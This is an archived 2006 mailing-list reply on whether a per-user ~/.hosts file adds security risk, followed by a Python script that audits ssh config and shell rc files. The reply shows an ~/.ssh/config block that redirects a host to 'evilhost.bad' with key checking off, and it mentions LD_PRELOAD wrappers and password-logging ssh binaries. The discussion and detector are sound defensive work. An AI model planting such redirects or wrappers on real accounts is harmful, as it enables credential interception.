On Wed, Jun 21, 2006 at 04:59:09PM +1000, Peter Ross wrote:
> If you are able to hack your way into a machine you can write this file
> so later attempts to connect to a remote machine can be redirected (e.g.
> useful to get login passwords) - you do not need root access to achieve
> it.

If you are able to hack your way into a machine you can write something
like this into ~/.ssh/config

    Host goodhost
        HostKeyAlias Own3d
        StrictHostKeyChecking no
        HostName evilhost.bad

For that matter, you could add aliases to .shrc or .cshrc to run some
wrapper program instead. Say, one that sets LD_PRELOAD=~/.libevil.so,
which contains custom gethost* functions. Or have it run a custom ssh
binary that doesn't do any host key checking at all, or logs all
passwords somewhere.

Once an account is compromised, all bets are off. You can't assume that
DNS lookups are valid as your C library may be overridden by something
local to the account. The login shell could be trojaned to hide the
files. Other users would of course be unaffected (so long as you didn't
give up the root password).

I don't think the ~/.hosts idea adds any additional risk. If anything, a
~/.hosts compromise would be easier to detect than more complex methods.

Craig

Received on Wed Jun 21 2006 - 12:57:18 UTC
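
The per-account overrides named in the message above can be looked for with a short audit. This is an added example, not part of the original message. The function names and the two sample inputs are constructed for illustration, and the checks only flag lines for review (a HostName that differs from its Host alias is often legitimate).

```python
import re

# Constructed sample inputs modelled on the message above (not real files).
SAMPLE_SSH_CONFIG = """\
Host goodhost
    HostKeyAlias Own3d
    StrictHostKeyChecking no
    HostName evilhost.bad

Host build
    User ci
"""
SAMPLE_SHELL_RC = "alias ll='ls -l'\nalias ssh='env LD_PRELOAD=~/.libevil.so ssh'\n"


def audit_ssh_config(text):
    """Return (host, finding) pairs for options that redirect a host or weaken key checks."""
    findings, host = [], "*"  # options before the first Host line apply to every host
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # ssh_config allows "Keyword value" and "Keyword=value"; keywords are case-insensitive.
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)
        key = parts[0].lower()
        val = parts[1].strip().strip('"') if len(parts) > 1 else ""
        if key in ("host", "match"):
            host = val
        elif key == "stricthostkeychecking" and val.lower() in ("no", "off"):
            findings.append((host, "host key checking disabled"))
        elif key == "hostkeyalias":
            findings.append((host, f"host key looked up as '{val}'"))
        elif key == "hostname" and val.lower() not in host.lower().split():
            findings.append((host, f"connects to '{val}' instead"))
    return findings


def audit_shell_rc(text):
    """Return (line_number, finding) pairs for LD_PRELOAD use and ssh aliases in a shell rc file."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        if re.search(r"\bLD_PRELOAD\b", line):
            findings.append((n, "sets LD_PRELOAD"))
        if re.match(r"\s*alias\s+ssh[\s=]", line):  # sh "alias ssh=..." and csh "alias ssh ..."
            findings.append((n, "aliases ssh"))
    return findings
```

As the message says, a compromised account can also hide or replace these files, so a clean result from inside that account proves little; run such checks from a trusted context.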